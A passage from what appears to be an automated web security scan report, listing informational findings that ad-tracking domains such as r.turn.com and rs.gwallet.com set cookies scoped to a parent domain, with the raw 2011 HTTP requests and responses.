dPfCuBK65VIPkK5kWZct35sO1Zn7pXWDz9pp4ib7xIdhf9zRg7pMNE_CJ40sHgFesrKS-sIOtZ0uWaFVuInERcUbOl0hZVWfZ4IPC39oh4ISFoEomPNyVVtSZY1RAo6Ssw0gNhdaAh0ubUxGmkN2fgVgehhyd0pky1b6ARNsIvyharCLLEFwpnlzXrhrzzYYv8tbnjLz1Zdsb_zZj1IfqS_aLZsRx-RLssOEi8Ic52I1SwSEzv1L7Xgy2Eldwn0osGTLllLrxdLGKvBbatPkttpJfAXFMB_81ZZqVp19l6yq--kytbvLV02MMBRF8QbYmkHZ9XZAHAsEZLsmJUb3ppXhtS9nRt7KX5Xvit0JJ8VmH7pEBcCAAwb_dsSSirzOYOWSpt9tKo6CdsoHgH6aru4Y4C1Oo_U7A4BsmBGEA7E6lGoeN4cYQLBhIGU78mY0O1B84kcRbagcEY3bvKO4WENO-4Aup8ydwoW1LAK5lzDCZf66Ro0bevR-FWOxJFZXHpkSB-wiy2euPF1s93pcsDAmXOMvRijJwI3i6Kr-KRd8-6tGKt3Z8Sx3Gwu4SNfNZ4Dc9CPpihH8V5KiSx-wwNBb6P5; rv=1; 
uid=4325897289836481830; rrs=3%7C6%7C9%7C12%7C1002%7C1005%7C1008%7C1%7C4%7C7%7C10%7C13%7C1003%7C1006%7C18%7C2%7C5%7C1001%7C1004%7C1007; rds=15156%7C15153%7C15156%7C15156%7C15161%7C15153%7C15149%7C15146%7C15151%7C15156%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Mon, 02-Jan-2012 15:39:04 GMT; Path=/
Set-Cookie: pf=jYpfHiwkL0q9Fc9kSjyuBBgn_wnb0_8qr_BqadU9rG7QZMj4YW4gjixh7pNwS2UBTEDZiJ73QG1Fncs-ZvtnGF1FGvBOgdBbEZX-YnBGLm7gM3D9ilPTjzMPHfvm2ZJRnQ3ziRBzpEB5dtK5nAeBUmYbbn7O8vmG9T4ZvTBxZ-fkUczbVJT5Cai6PVkpiYM250Hn9REtTxKxE8sY6J3ypnin2DltV7TDetw9hjspxXZhD8p41r9TwMfEMg-G1XemtTB2tozm01YLbZIiUMvmqnqcRK5l5t99h9o1nyRJGB-FVxq_hTarUuNMxmlOGv8i7uQNESU0ZB56kdO0OzIJXwIs_FraXwaqx9H3t0t_K8ypqvHTLNec123RZuM5_NQFc2SDKyJaL5qarBv4Mwfu6hbDkZ7-COXcc7J638-N2-nGmnSXYlumivx65OLyIDjkiclTN27E7VAjyP94ylXV2THc-FaZMQYHJfzm7Wd4vCeBVksj6qG_vGOBRszlEhTBHJJkbCwqlvtJ4YMajskqFiOxya5mnbA7S3fs-iJhVbcnz2gJQYfShI1TCMqbtLiB20vA45lRWnNPOHTjbHe0UEpEgz7rg3mBmvvpNOjjPm1ShVQJNOkuyKXxjHeUbdb1vdEe_5ovSouJNB12j0ymtjbRa7aarVBYGbRDMIU6CnuHCuJ-pktYTsiyWrGNv7OuJsye64pN7BOura6aOSSI4b0Rt8phWSAaqD7MP1KznZpkTlhpXh4-TTR0ThSULn8x1UaE9wNorS3GYtjFZhcRVjJtfcYNkhzgDL3eMoWYNnYZqDKZRMvFd1ZKcUJuq_zhyyoX1Pm8pjzP3_QghQ9Mhio8jk9cro0gAwFF1DDFwTgH5PxTXVL6MoBnLB4b86CcB8cTKKUjKihGgM2TUJhZG3-h45YbzGndZUDHE2X88AvIcBSo3moUduDgWZjkDYofLI3QTC9S8KPN85sRP4COobdYXsT06PSNQWuuG0Xn65Z3TsjwnGp1987qUWPEQeKMZGxJcekloD_rTqVoMnmvyUxnoiuihCenkYB2EtVtlsCeyQt7jyEfnyFotaOujGmKeSahF2EZm46lAKLF003b0aLuJG6qbnKeGwdBvyJVdvGSPywaPWKJ5BRBfOF_6vvw0FtvmqU9JaAKw66loiImQTLzz78ETcLhQCLITMYwtftNww_XA-rRSdgEN76SA2KFbCG0h-75nZpxziOW1ekTf_IRDhOcOSKJofmwpZhjQmZKT3Nh_cPzwAkdpELNjsHGDgwfAOYMl-ze4C007tvDJ6VdfZ0Oh9nSGeaNSCn7BkNAtEibl5r00ChmOkCE37PQIS6dq7wPT-1B87w3eSIvWRK6JC2t1oeUqveL4vnLZ7v2BI8mOR_5Vtk4hl7LQbH47KHn9mApouFIrwoHgitvHAehUtrZB2pIKMrOd4ecGu_5Td_uxCtmy4XXdxPxi6IKIjh7TJldhJ1GEczWVD_bGDc5v-2kLO9WqTDY302oYnzhwqCcIDoCNscaj0YzBqlfTzIyDrkH8vxatsKDAXQ4Jtsl3_oK7x_ip5W7JjCcrLcd7TBTL-_O684O_LyajFvidwb0lwMpvI_qobXEf8vwpXx6CjgObJXPAwErnDdRiZXG6Rzjlrpvxx7MGKC7oc-DJnbgu8dTjdEu82cH1uuItohCE1GVLsDIM9OdE-Q70TxRIlHcKuOK0l22qglRvlRyVeDa5R_skBBpROqVdegphoCA2EMAYy34m3C8AxbQVXv2tLid0B5RDfv1jI7nqI1f-8CctWfpBr-abLfwawha_eevSu-BeNRGS6-l3e5LdUzjTr5IHUlZPEoPSUcuuHcGVq3GMZ6CGJzLxK1NMIN_YWa2WWtfKqGIbTsLzoX0-JPgHLZuqjGn3YuU0loBjwMsmJ7XoXxix2tpkkNV5h1NZXB331PWryy2AG1BPJuJLVT4zIbE77kZcMZssTCDF_zNz
v-hOQROl4HLc4UEWkb-u9aQ2rlen_mi55lWZqga_d0hTj-SD3oxsmwzn6Nq55trU-j1GQDzb1_ZvVwhRx0Q_uptE48rH8XCjOJUjQpNRLtZUDvekFZYlXQhitDAZOk6GY0VvVV0mCTSvypWIKrmyCjnr_gKagRSe4UTtSCll_gcGWTDNHC7qecFGk6z3e4O0QjMPBVo19szbTqBQzKlRSAllb1lD1Roagx8HVZqckVirWevftR-aku-hH_QPd78uCldR6o9Qveax8GXpS-aKypm31G_2IGt-C8CPV-k7sgwePfDaD07bFLHwbqeTRWrco6_yM2p6Eot3ZwbE8FNSMSRIUsVwczLLGyq-r3M1YwftiV7Mf5QNKakiimAbPOjWExPrbATLtIx3O0c7l-xfe6kPje8Lja2G_-zUipKgOcNMCj-oHgdiHJqq2uIgWnKHornuDOeLaiUkHIWVvckwkpCJBC2lm-u9i2rrm29_ZDe5dliakw6C2Rj8twiLlfzlikzpR7JfAp40cJcV6GlW0tIfGplg51pTREVDGmHH4AODXGdnK9TWlENpzw35TNdxfAxeUs1cPEOi64rainP0SCUkAmOLbuWn7tumbrHggoOTL0WyCGh3thvCqRtyaVRZz-2-3jDxWUSFOnuPF3ocmPNwA_bOdm7YVJUp4jOEdBZiYsXssmmvAyBz0cS2i2Tg9SBfWFvM_sO8OKD15OvQrtoSZMz5FTL-BuuozwA6N992I4-6hay9R2qPdJa0ze6SLrcfsCWB4Ky3zErqDyKQ9H0wl5_pELpIMT-1qNVdptv-2EVPdJHgZb0fdvbb_D05T4qw5NQ4IrYDRR6LV3elq1du1FqUseWHsqUVdnaZ2p6yXCUtvl4kPfb3QvIQhlltw8I1JpUh0NabZ58BmDwzPN5xltYK_LIcmdq_cpCxj7gQ2WlhFEkoKakhmHHWFkCePG_lq0jHRCZqo4u7okLdFJqi-23qryL4RN3Z0_aFQqDJg0rCBPD3aZqwLxsqDIrP0omCCN4boCegtfrjelXIeOuxrabXhN352MSihMc3-CVcb_kL5lOT9YcyoeJCg59Ijq8T2zgbVOU6zwBc9BcCnSWHFJw_RNB4fezftLML9d5dfvImsTPPvytRq-SoKYxwTHeA0JV-k-xaXuxkj_GEZSFgKdvBKHx9YsruAWjGFxZI0LubOY8fcDAh6xXzWCLVyQcJ-4oTSkYea1NH6xrxdYAaCV1D2k5am92malOiIupL4cMEfCOY7PzeBIuEFG_TjYOgum33GKCIuS7h__v7R45kyBgr7GCpwTTxWPWsVXGEu3LV_WOrXIlPfB_scXK7chTLmYhurC2Xmi93xEyKCpBoulsldLgoWwnRjkFUAbIECT6iggql6xRUe762UGNEynlJ5s-S_H9UP9RUUV02QidOFo-W0MGae-aRTNY2Bw09vXCoTf8EnEVDK1AK-L1; Domain=.turn.com; Expires=Mon, 02-Jan-2012 15:39:04 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Wed, 06 Jul 2011 15:39:03 GMT

GIF89a.............!.......,...........D..;

9.40. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC80/rnd/999

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/du/id/L21rdC8xL21jaHBpZC80/rnd/999

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: uid, rrs, rds. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/du/id/L21rdC8xL21jaHBpZC80/rnd/999?nocache=1754&1=999 HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://p.brilig.com/contact/bct?pid=14CFF267-5CAA-4454-864E-139B5E28A8FB&_ct=iframe&adid=2723&action=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=jPCRKqrj87qIJxtlMQWAeEChT2n2hjlNeUtfI18EVvCY481wEkFtGX7HudJA1SwJI3d8wh-8F3M_mXcdjcS-VSm0eLaoIKxUGXp9LrfCkU9_tnfsaUjBl08t5WPRK0VURVro0VaYJSFBW8ummLzmaIKBmXLKaNQC_VstFH2_fFpKQkzhSzd0OA7TdBU9TjZEJGXtc03lRAW7XQ4DISJNToVALrQWz2MTLkxqGX2dkixiiuCgw-RUBPrhyXIonq-JO1Bp39fVI570M3anNYXEeUs1tPAJ0EW-1VMg8V7a5wldzyMGDGIyTnWkwLiiAh9MnoUAhDiUl9Tegk8e5loBtCPfUfWmFvuHa7ho64SbyNRCdB0gGLuWZn2SFARzFJPESwQcmlx05sJTCiLTcgCP4At5Nkw2i8ci7zeXoamyfIkXLuYA-Dhd_NCbS18tUNtNvkWLzJ6aRrpGreADONKQFjqdAq7HLak39li3oOzBb2LeZa7kJWdY4s3_LxRnaveh3zRKhr_QKICSCDvtEvXL5bc_DW9fRIIhGqjaZpBQKPuvEW4pltifd2UFOGJBUm-HNrIvCCgnCtouI-Uiugr_XDqnokT_uSlOVd9om3L3_Zyu-SvKhx26d2lgxRL2g7NnpnufmqwPr0iX6TO_QvAchAci1X1kdq4IOav-VGBUnPFENQMte8mJeFRkxXb-wFJ5RVro0VaYJSFBW8ummLzmaNGHuZ00Doye8JlLv5mr5PFKQkzhSzd0OA7TdBU9TjZEAKZ1XvhQcWRwSquFFdyqk27PUbblbYukMk_ukxgrNp1iiuCgw-RUBPrhyXIonq-JrVUsFGMjIsjG4wG8JccNY0s1tPAJ0EW-1VMg8V7a5wn-FB-cNjGuev6cKfXYBTnN0_vou2SdMt8u86ZsS3JrqiPfUfWmFvuHa7ho64SbyNQHZddyBwQ_bn6DeUZJIktJSwQcmlx05sJTCiLTcgCP4PkIlx5s8TLQpLlToa_KmjIJFHg-6pvIHl5Jd-boptVivkWLzJ6aRrpGreADONKQFi1uWhCbBLDkUUl3GB-cia7eZa7kJWdY4s3_LxRnavehkKIyZUcKn4gaSbbrzqSrcgqUnZs_qTc4J1uECWvW6WbTYemUMl4rww0Ahse7Jfbjh8YLajdpYA5oCRPEinWDNzqnokT_uSlOVd9om3L3_Zxs-1IWnYFHuATbbO_y4X0qnTAQXKSKZxRRHNLIhO3aIaSqEypMHifOKCbgAvu2-dYixi2mthDBgkkh8E1XVaeYRVro0VaYJSFBW8ummLzmaFVfdYHK1Q73JpHXN0tZ5ChKQkzhSzd0OA7TdBU9TjZE1kmOSSok1OTXuW9iz2m4nL5yE_6sd6seuxofVhtsYmBiiuCgw-RUBPrhyXIonq-JQurUvISATSSNOXvmuhMCV2KK4KDD5FQE-uHJciier4klqT8ZcugfJqC9EwK5ktSgSzW08AnQRb7VUyDxXtrnCWozIMOsCXwOUoX3GwmeVVAxi8wzskQPsxtBtldyMSwagsPhD5djythOHSHCTJOhXN8kothY4cGzuNEdryxzqqlLBByaXHTmwlMKItNyAI_gA5nIMgtWWpg9SGtTLubci8mKqUVNtCEf11hjerFm783rueT8thuReMGYM-G8N401JqMaNEKucbt7MzwWQQWU-d5lruQlZ1jizf8vFGdq96EVQq5esqu6oyUY2zlzU2xLXWhOIfbu6nlVGazQ3C00oYS8zm8KaUf2JPX_XkHFplCbza_ABfjL7BKJWmajZwI8OqeiRP-5KU5V32ibcvf9nKIPnlMyG4VsL_dpoB-0W9QGvLE_z_KyAskRioKbfxN_786M9IuI8BYnDc-poA-MUnfZxmx8Z1na_56NWnVp5lVFWujRVpglIUFby6aYvOZo-guTtl2FC1HRuw7-BKiPgkpCTOFLN3Q4DtN0FT1ONkRfEwEV-i4hDFcRNIjoo
2NgkPVO08UdjTRS6iKsNti_SGKK4KDD5FQE-uHJciier4kPyz-Wufncl9LyPoL9B1QKSzW08AnQRb7VUyDxXtrnCYqBIOxmA7cQDFoERRAumqjQS-E5nxed_shBlbXuObLDI99R9aYW-4druGjrhJvI1JH00lIUEmEEA_OFUDNzutxLBByaXHTmwlMKItNyAI_g_3bTqCYCGbHkXEVzPY_01mXeNri_O61lm1ldtHVrpR7ZPRGnTyb4BtK8arS2F9YZe4UCz5TMA5hwrPrqery6C_wkRIQCoel50LHttKKxvj2T-81UMTQPlYAknpDpTSLEO5HiathQKE8omxVc53FpCRoxDfNmYDnxg0EvFrwRe3pCS4dcida2s-s0XQ4z8fCn0-2F-mOoQpGwjdYnRQCARZtq_gHnWf9fXfe0G5ZJVnGpH8LKKIm0TYD_Luo27v_Fd79BPBBGXhysRhWpW1cyG4cyxzjZGmjTf1aqiATmAjS8PU8Ims583iYmtl6BnonGOZ_I42pI-l997CutSY5UTnU6t7Hj0VsEozVWpOhdHdFbLfPqvGJUWoA-TUxLJGtuWy3z6rxiVFqAPk1MSyRrblst8-q8YlRagD5NTEska26shJ8rvIZ2pEIvj7vJYr_-ftZVQVVx5oyA1oNVdb0c2RvgUG90xsnNOLDcsndxj6Hfhp4cgON-zdligsRs6_1T34aeHIDjfs3ZYoLEbOv9U9-GnhyA437N2WKCxGzr_VPG0U7eaD3Hbtxwd0g2BAEnxtFO3mg9x27ccHdINgQBJ8qENCoPz5YPQkhGm2FiUj3LFz3e1wa31-DKI83R83jg3QTL9zDrzTFlXoiMqjuSWt0Ey_cw680xZV6IjKo7klpI3j9xuCx21BIxBdXN5YAR9AhrAwqavcLA2O6a4z37Lsij7qsRPo1Q9IcnQsYBZ5nZ4Yik6WYEG4S1yIWi95cAawB_d25XmA1YnkFKy4M4_IsLKOVSlL41zvQ6wOKAHEjq7nKInFrgoG_62xoiLBKT6u5yiJxa4KBv-tsaIiwSk-rucoicWuCgb_rbGiIsEpOvDsfne5seg63D4x3flsyZrw7H53ubHoOtw-Md35bMma8Ox-d7mx6DrcPjHd-WzJlOSrp14Y383TLXFJ1T7HeQDdh5RodnqZ0dgGASOf1Fng3YeUaHZ6mdHYBgEjn9RZ6k3CneyeK26bqX2BslrNlwDg97pn0xq8XVtSFY17J1rA4Pe6Z9MavF1bUhWNeydawOD3umfTGrxdW1IVjXsnWsZmDwoJlEZXfDBjNrKbkdHGZg8KCZRGV3wwYzaym5HRxmYPCgmURld8MGM2spuR0cbb0sPsXWgw_x9D6jnx5LK_2BhDosUowXxXmwB90G1tj9gYQ6LFKMF8V5sAfdBtbY_YGEOixSjBfFebAH3QbW2GhE7gFloT4X513bbUoowJpoRO4BZaE-F-dd221KKMCaaETuAWWhPhfnXdttSijAmjoFfr6E7AtWKXcAv7zPgNhKraltt_znEUtPzey_YSNRSq2pbbf85xFLT83sv2EjUUqtqW23_OcRS0_N7L9hI1Fz-QUXxY9m0RT2v_0PtAEz3vMJW6Nolrhqx2yRbBnwHeM8DMgjvm5t97BtYytOx4Rqhj3O8p-XR3nA6DvXKpTl; 
fc=NPwnTj55SxablmgxgOU6YvTAau0fxQm9Ss2FVtOc0fRwe2fiMiJstcorldPAQEWsjtR00WuVUesotFeF8b0iqzTwskhjzr5X5fLnW2Y1L8oWeSZAoSqfzCTWGJqSVzUxwmWj6rOwJQbNe1FGkQ72Mr3ZyRv0KSWu8UtGn86vdZZ2Bxw8hDOLkguYqml5zW-MINBiIQ09VuaB6H4kNZ3jvWDXo_Ub5NvFSqNxsTqhNOEJzdGEYQUbYRsENlG1EkxlHr-vpMpIww2oeMaNqJcAGNVCVYgScgvT-7lnf3tWEtoI26ZIhO_EYD2Jv5etTb7nPXORZ_ihz3v_EDqUfBGd38kaFp7wmgHwSln4BB0aAU-Y-fE6mCrmAAKxJpNINZh0gYrE3U6bhGdZv_0Ofvauqo02tkR5MgBK5U8r1oXGHyKLM2r82BMAlsOE4kKakojRElg7FxL2FmmNWsvuLk3EV1Ob1kR0cv3Vim-wWYu2PuOaPtJF5zGBev3l88f3V44c; pf=imLa8Y9K7y9JWjvDp9rzLXdg786oafP5T-2J8P9-MbRqAdtWEIdLx553uOXwyk_d7lMV6ku5x6Fs62Dm_QelJC3HNez-Z8pMdla1M14yZ1aXhaLn0WGDkLMH4cxWtxtJnQ3ziRBzpEB5dtK5nAeBUmYbbn7O8vmG9T4ZvTBxZ-fkUczbVJT5Cai6PVkpiYM250Hn9REtTxKxE8sY6J3ypnin2DltV7TDetw9hjspxXZhD8p41r9TwMfEMg-G1XemtTB2tozm01YLbZIiUMvmqnqcRK5l5t99h9o1nyRJGB_k59seAzgg1-n2fcjLvpOMi9tA_b87Jqn_e3gK2wczGx_CWj995ZG4J9ayZG8Azab13_ic6bm3qPlYluqL2y0jaU-Oqt1gdom4zJIFfDwZ9PMXsV2RPLlXKhVOkCzWSAMHy8NkV9GlxOD5jcadlcpoFV-_N4_TQoIGyiXOJHiskWx1ZATf6jr6V7CCyVFok1rG6pyhUqm2FHzEiDJ6sf-pacXWwno-sBBfZi85NtW5Qt-_BHDFm96AL-Hlvz6iB4BqpqgoK--2Z8dYtNlLNE0_IPCGGg4JuduY91z0-G9PFEs00MFyErnctvH2BT73d3_FZBD7b-KShsGHFtw-PJccEMxwAG8SoEVS9m9Zd2vmWErUUgLCw4NxIwxNfjDRkuTL2j5Yg93F_QOtFzYyWOePChv1i2naEiRm-G40oRJBGTBpVCc0qMQ7XSXeQvsWsjFHiMSxf4LuiqRb7JIEpKg8kby9cY_1mRgRy-7Zp8tzhfOiqJ0pMkyWUtj3tCfqb_tGZRzNBjxRhmI6dM4mbZKOYU4-nV0UYeEGUxF1S_oHu4hFkzr5r4tc43qm6cSueuRO2hVcsSqb840lbAIGS9ubZxGaNUCyMdwNgf2avKHVNnolOOu7jj76mTVAdA_mdYfmHtPNZuqI_jxiXxEOs5H0vlfIlKbmfHqHUcP5b-IIns1zek1KJ0W2qXBTetRtqOYNCGSsyjP4AXt3T9RPBVkJDNnxwnTaHhSt6_M966_yDGRntkal431Er-D6EvQQXSzw07Q7-ZTvu6ltuMBngQyhlUXNT1Hb5nCH2u9H8JYL2vqi7ZcubYPjdCiTEvC6ixvxWnBAvvN4YHBYs623Zfp7mYinN8F-xomiNBADxpAVRXj30kPclrBAUX47luAB61FeciHDtDUZA6oDA9lgECWxePb1qgK2wydMqKon7gU_K8C3sxgZqLnqGwdljDWk8V-5saTK0J9MhEtW2SZi442SAJJiCcWe8XmAo-ZeIFD11aDlRV7nM6V6_zFKpP7wlLYQPKIschJVNwDZdXQ9qmKL_Qbi_JfgEHW4reZkqoXAIHtX_b9gyna0u7aW5BDNIqsWhukbMM8brSoTtnUG56p5TJB44WFzdjkM-mROp9OOL7FDQ7cHkGLYBuqZ3lgWaipiAFXhGx2dqcch-VuzoEikRXiOR4xa
xbvDpaqAiEb8VhvKcFx-ovh4Sl88FoBqgf0tyxN9W-kw0R4q9C5CmY2JUjJXnRD7WzNJZ_sCBAgpM1TWvCRlVZFXXZnqNPukYr_L3KLsKcRyxoRdaMovUBfTNEPRSKFgtbcbx8BqX90ZQQcpEfWqJMVmEBPEAIGejpPCFWKz3O59OPx58buvJ_uvNLcUoXM2ObJkBpZIBDJKm2ziC3HJIl0BWgLsB3Xb9sspub1VzehZ-dnjQrUAX1RWz23DJ4AN2p3Bkps3nmT_CyZOWO0K6AmyoJJ0WVqwfHJmkvMMecgZzynLsGgRc_i10bzP3aegk4VhMUbe1DPDoRajStMsbCQClj0a4aNFYQ33AhPyEf_pRhJLMk6r38S9EXL7rx5ntmq24iXH1baYIQ5WA9IExVRwqhQKkb2ecnJ-2UOQj0PVB__QK20iFxmMrBi_Ozk9p2lUUv6L37oAr_AV6d2dHRLCHQNMiRthyWEMiVlxcMdEeKLokMX7jcq64dIsZNbiFzVInJ14TCwCQ9fqReykA8qBRaCLn3AdbjtskBuPk60M0N683DQsE4ZC-hxMORC22isekOI2V75sPw5QLpTHbDx3qmiChRuhkT71jvR1w1cjNDo5Itf_BvoKeVF3ZR9-1s7QiDoMPUY-ZVqhnCeQMjDTZrbWEsRIvXQWcM2EqCJfHKFgH6ShjUTMi6Fy8HuTX3hHZqIyshrEm0-qlU6GLKu8GfLpkN0bDQNM4p86wye9uBqQI4_fI7zC0JJ2DuRXGxP-2g9_CgYuY8pN_VrecGDh6UwTrru9GLmwxbidN1AUdQybKB4VyjEokVAfrO6zFP7ekqOUhJzASYimudaJc-nqwrLqeBidwfS-yH1nGi3UeGqKb9R2O8_f7i8ovAE8EZ8c3EpZGfdvY3YmYKNPM3iO16JJWQBvkviQa82CG4NkuHuK5hHF8F4pZHDyRRzEoRhIsHjaFVUhglHsoi-_gue4Y9GYFWcPlXqN1LcUW2PklnchprXEhv3r7HtHIEvOa8bUpKMjK8lg77zJlCabEdFr8zLsnvY_jhe-w8LS7NnrSfPrT7_ys5OYzXfKqxN9PqlPQO7yAyIRqyycyKA8i0F3zIMbv5tUub_jys2KG-DoXTNzLTlHYmH8wMN_undN9fZc-pI0Ny4hubjOBUf2DQSm9Ohj3B7jgP9CCqG8Wt-ubVX90wI71XdOFbmuO_nu7xzWg1owdmgiD4haU31wETkVUs2IUBSWSwU9HuGqutvFVd-RPEMlRmI-tk5XQOBLE3hkIaiREQLK5qM9EX44AOJlvs8DYm-_z8wtr-sIKH6L02PQc77v8w4KeUWdpWld1cOt5B9y5dzZtTu3JqKGLAN1pzcD0dPfCuBK65VIPkK5kWZct35sO1Zn7pXWDz9pp4ib7xIdhf9zRg7pMNE_CJ40sHgFesrKS-sIOtZ0uWaFVuInERcUbOl0hZVWfZ4IPC39oh4ISFoEomPNyVVtSZY1RAo6Ssw0gNhdaAh0ubUxGmkN2fgVgehhyd0pky1b6ARNsIvyharCLLEFwpnlzXrhrzzYYv8tbnjLz1Zdsb_zZj1IfqS_aLZsRx-RLssOEi8Ic52I1SwSEzv1L7Xgy2Eldwn0osGTLllLrxdLGKvBbatPkttpJfAXFMB_81ZZqVp19l6yq--kytbvLV02MMBRF8QbYmkHZ9XZAHAsEZLsmJUb3ppXhtS9nRt7KX5Xvit0JJ8VmH7pEBcCAAwb_dsSSirzOYOWSpt9tKo6CdsoHgH6aru4Y4C1Oo_U7A4BsmBGEA7E6lGoeN4cYQLBhIGU78mY0O1B84kcRbagcEY3bvKO4WENO-4Aup8ydwoW1LAK5lzDCZf66Ro0bevR-FWOxJFZXHpkSB-wiy2euPF1s93pcsDAmXOMvRijJwI3i6Kr-KRd8-6tGKt3Z8Sx3Gwu4SNfNZ4Dc9CPpihH8V5KiSx-wwNBb6P5; 
rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7C1%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7C1005%7C12%7C1006%7C1007%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15153%7C15153%7C15156%7C15151%7C15153%7C15153%7C15156%7C15146%7C15156%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15156%7C15153%7C15153%7C15149%7C15153%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15153; rv=1; uid=4325897289836481830

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Mon, 02-Jan-2012 11:21:55 GMT; Path=/
Set-Cookie: rrs=3%7C6%7C9%7C12%7C1002%7C1005%7C1008%7C1%7C4%7C7%7C10%7C13%7C1003%7C1006%7C18%7C2%7C5%7C1001%7C1004%7C1007; Domain=.turn.com; Expires=Mon, 02-Jan-2012 11:21:55 GMT; Path=/
Set-Cookie: rds=15156%7C15153%7C15156%7C15156%7C15161%7C15153%7C15149%7C15146%7C15151%7C15156%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153; Domain=.turn.com; Expires=Mon, 02-Jan-2012 11:21:55 GMT; Path=/
Location: http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830/mchpid/4/url/
Content-Length: 0
Date: Wed, 06 Jul 2011 11:21:55 GMT


9.41. http://rs.gwallet.com/r1/pixel/x1094

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rs.gwallet.com
Path:   /r1/pixel/x1094

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: ra1_uid, ra1_sgm, ra1_sid. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r1/pixel/x1094?r1s=enJsne_2xin_W0gqpJPdDOiRtZgEH_OufcvtkeNI5aQ HTTP/1.1
Host: rs.gwallet.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTAyIDg4ODg=; ra1_uid=4626038992661376064; ra1_sgm=i4-b510-7K0-e5r0-I3r0; ra1_sid=3

Response

HTTP/1.1 302 Found
Content-Length: 0
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: application/octet-stream
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Location: http://tag.admeld.com/pixel?admeld_adprovider_id=553&_radium=0
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4626038992661376064; Expires=Thu, 05-Jul-2012 15:39:06 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=i4-b510-7K0-e5r0-I3r0; Expires=Thu, 05-Jul-2012 15:39:06 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=3; Expires=Thu, 05-Jul-2012 15:39:06 GMT; Path=/; Domain=gwallet.com; Version=1


9.42. http://rs.gwallet.com/r1/pixel/x1225

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rs.gwallet.com
Path:   /r1/pixel/x1225

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: ra1_uid, ra1_sgm, ra1_sid. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r1/pixel/x1225?r1s=OUPv0729NeoDz8CeIHHoYeiRtZgEH_OufcvtkeNI5aQ HTTP/1.1
Host: rs.gwallet.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTAyIDg4ODg=; ra1_uid=4626038992661376064; ra1_sgm=i4-b510-7K0-e5r0-I3r0; ra1_sid=3

Response

HTTP/1.1 302 Found
Content-Length: 0
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: application/octet-stream
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Location: http://bstats.adbrite.com/adserver/behavioral-data/0?d=48272602;bapid=12553;uid=1030306;neg=1
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4626038992661376064; Expires=Thu, 05-Jul-2012 15:39:06 GMT; Path=/; Domain=gwallet.com; Version=1
